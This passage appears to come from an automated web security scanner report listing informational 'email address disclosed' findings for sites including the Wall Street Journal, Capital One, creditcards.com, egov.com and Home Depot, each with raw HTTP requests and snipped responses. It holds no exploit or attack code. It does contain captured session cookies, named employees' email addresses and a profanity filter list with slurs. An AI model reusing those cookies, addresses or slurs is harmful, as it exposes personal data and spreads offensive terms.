DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=0000TmBX4KO-rJaV2iXrP37zo_H:-1

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:28 GMT
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix) DAV/2
last-modified: Fri, 22 Feb 2008 03:38:44 GMT
Content-Length: 40409
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Language: en

// Version
// 1.0     Some of these functions were shamelessly swiped from a javascript form validation
//         example lifted from the Netscape website and from www.internet.com.
//         Almost all have be
...[SNIP]...
t + 'The Account Number you\'ve entered is invalid. Make sure you are typing all 12 digits from your label without spaces.' + back;
var iEmailAddress = front + 'E-mail Address is not valid. Example: alpha@beta.com' + back;
var iLast_Co = front + 'Last Name or Company Name must be completed.' + back;
var iLastName = front + 'Last Name must be entered.' + back;
var iPhone = ' Phone Number you entered is not valid
...[SNIP]...

18.9. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0004/provided/j_global_slim/version/20110524192024.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sj.wsj.net
Path:	/djscript/bucket/NA_WSJ/page/0_0_WA_0004/provided/j_global_slim/version/20110524192024.js

Issue detail

The following email addresses were disclosed in the response:

infotips@yahoo.com
u-suke@kawa.net

Request

GET /djscript/bucket/NA_WSJ/page/0_0_WA_0004/provided/j_global_slim/version/20110524192024.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: secj2kapachep02 - Tue 05/24/11 - 19:51:19 EDT
Last-Modified: Tue, 24 May 2011 23:51:19 GMT
If-Modified-Since: Tue, 24 May 2011 23:51:18 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 480915
Cache-Control: max-age=1688285
Expires: Wed, 06 Jul 2011 00:20:39 GMT
Date: Thu, 16 Jun 2011 11:22:34 GMT
Connection: close

dojo.provide("jkl.jkl-parsexml");

// ================================================================
// jkl-parsexml.js ---- JavaScript Kantan Library for Parsing XML
// Copyright 2005-2007 Kawasa
...[SNIP]...
<u-suke@kawa.net>
...[SNIP]...
","anus","biotches","boobs","m0r0n","fuckage","h-o-n-k-y","fuckkk","c.u.n.t.","f-ing","cornholed","fuctard","mcwar","oblahblah","mcshit","http://www.debtchallenges.com","http://blog.tradingideas.in/","infotips@yahoo.com","dirtbags","azzes","goddam","bimbo","chick","doodoohead","www.themastertrader.net","monoprice.com","http://www.dollartalk.net","shlt","dumbasses","phucked","http://www.jewwatch.com/","shiti","www.you
...[SNIP]...

18.10. http://sj.wsj.net/djscript/require/j_global_slim/version/20110615092718.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sj.wsj.net
Path:	/djscript/require/j_global_slim/version/20110615092718.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /djscript/require/j_global_slim/version/20110615092718.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: secj2kapachep09 - Wed 06/15/11 - 09:27:23 EDT
Last-Modified: Wed, 15 Jun 2011 13:27:23 GMT
If-Modified-Since: Wed, 15 Jun 2011 13:27:21 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 225800
Cache-Control: max-age=3551527
Expires: Wed, 27 Jul 2011 13:54:18 GMT
Date: Thu, 16 Jun 2011 11:22:11 GMT
Connection: close

if(typeof dj=="undefined"){dj={};}
if(typeof dj.context=="undefined"){dj.context={};}
if(typeof djConfig=="undefined"){this.djConfig={};}
(function(){var ctx=dj.context,djc=djConfig;ctx.core=(ctx.cor
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

18.11. http://soundcloud.com/premium previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/premium

Issue detail

The following email address was disclosed in the response:

sales@soundcloud.com

Request

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 40
ETag: "24afcc165cc7920863a831dafc546f14"
Cache-Control: private, max-age=0, must-revalidate
X-Cacheable: NO:Cache-Control=max-age=0
Content-Length: 41457
Date: Thu, 16 Jun 2011 19:30:29 GMT
X-Varnish: 2254931704
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Vary: Accept-Encoding

<!DOCTYPE html>
<html><head><meta charset="utf-8" />
<title>SoundCloud Premium - Extra storage, advanced stats & other great features on SoundCloud - Create, record and share your sounds for free<
...[SNIP]...
<a href="mailto:sales@soundcloud.com">
...[SNIP]...

18.12. http://www.capitalone.com/css/footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/footer.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/footer.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:28 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 14:09:08 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1720
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Global Footer
-------------------------------------------------------------------------------------------------
...[SNIP]...

18.13. http://www.capitalone.com/css/framework/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/framework/base.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/framework/base.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:26 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 13:58:09 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:26 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4924
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
----------------------------------------------------------------------------------------------------*/
b
...[SNIP]...

18.14. http://www.capitalone.com/css/framework/grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/framework/grid.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/framework/grid.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:26 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 16:24:05 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:26 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9434
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Grid Containers - 960 Grid System
-----------------------------------------------------------------------------
...[SNIP]...

18.15. http://www.capitalone.com/css/framework/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/framework/print.css

Issue detail

The following email address was disclosed in the response:

james.steincamp@capitalone.com

Request

GET /css/framework/print.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:30 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 13:40:43 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9786
Content-Type: text/css

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
-----------------------------------------------------------------------------*/
body {
background: #ff
...[SNIP]...

18.16. http://www.capitalone.com/css/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/header.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/header.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:26 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 11:22:03 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:26 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 15991
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Header
----------------------------------------------------------------------------------------------------*/

...[SNIP]...

18.17. http://www.capitalone.com/css/page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-nav-heading.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:26 GMT
Server: Apache
Last-Modified: Tue, 20 Oct 2009 20:24:22 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:26 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4843
Content-Type: text/css

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Breadcrumb
----------------------------------------------------------------------------------------------------
...[SNIP]...

18.18. http://www.capitalone.com/css/page-type/product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/product.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-type/product.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523948; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:29 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 19:38:51 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 10:40:29 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1794
Content-Type: text/css

/*-----------------------------------------------------------------------------
Product Page Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Product Navigation
--------------------------------------------------------------------------------------------
...[SNIP]...

18.19. http://www.creditcards.com/javascript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /javascript/s_code.js HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:30 GMT
Server: Apache
Last-Modified: Fri, 10 Sep 2010 19:29:31 GMT
ETag: "7a7477-5e8d-48fecc40bbcc0"
Accept-Ranges: bytes
Content-Length: 24205
Vary: Accept-Encoding
Content-Type: application/javascript
X-Pad: avoid browser bug

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

//var s_account="ccardstesting" // TESTING ENVIRONMENT
var s_account="ccardsc
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

18.20. http://www.egov.com/Scripts/jquery.pngFix.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egov.com
Path:	/Scripts/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com

Request

GET /Scripts/jquery.pngFix.js HTTP/1.1
Host: www.egov.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Length: 4780
Content-Type: application/x-javascript
ETag: "{85ACD55E-FA47-4EB0-A8AC-D6900A3E557E},4pub"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6529
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Jun 2011 11:15:54 GMT

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:

...[SNIP]...
from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

18.21. http://www.egov.com/Solutions/Funding/Pages/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egov.com
Path:	/Solutions/Funding/Pages/default.aspx

Issue detail

The following email address was disclosed in the response:

eproudfit@egov.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 50272
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jun 2011 11:16:00 GMT
Last-Modified: Thu, 16 Jun 2011 11:16:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6529
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Jun 2011 11:16:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir=
...[SNIP]...
<a class="email" href="mailto:eproudfit@egov.com">eproudfit@egov.com</a>
...[SNIP]...

18.22. http://www.egov.com/Solutions/Pages/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egov.com
Path:	/Solutions/Pages/default.aspx

Issue detail

The following email address was disclosed in the response:

eproudfit@egov.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 50788
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jun 2011 11:25:08 GMT
Last-Modified: Thu, 16 Jun 2011 11:25:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6529
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Jun 2011 11:25:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir=
...[SNIP]...
<a class="email" href="mailto:eproudfit@egov.com">eproudfit@egov.com</a>
...[SNIP]...

18.23. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/static/scripts/jquery/jquery.pubsub.js

Issue detail

The following email address was disclosed in the response:

dante@dojotoolkit.org

Request

GET /static/scripts/jquery/jquery.pubsub.js HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
